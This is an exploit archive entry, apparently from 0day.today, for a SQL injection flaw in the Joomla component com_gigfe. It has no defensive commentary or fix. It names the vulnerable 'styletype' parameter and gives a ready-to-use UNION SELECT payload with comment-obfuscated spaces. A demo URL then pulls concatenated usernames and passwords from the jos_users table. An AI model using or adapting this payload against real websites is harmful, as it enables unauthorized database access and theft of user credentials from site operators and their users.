id: 11271
date: 03/12/2010
title: Joomla Component com_gigfe SQL Injection Vulnerability
author: DevilZ TM
cves: 

======================================================
Joomla Component com_gigfe SQL Injection Vulnerability
======================================================

[~]######################################### ExploiT #################################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_gigfe&task=style&styletype=[SQL]
  
[~] ExploiT         :
  
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**/FROM/**/jos_users/*
 
 
[~] Demo            :
 
http://server/index.php?option=com_gigfe&task=style&styletype=-1/**/UNION/**/SELECT/**/1,concat(username,0xa,password),3,4,5,6,7,8/**/FROM/**/jos_users/*



#  0day.today [2023-03-21]  #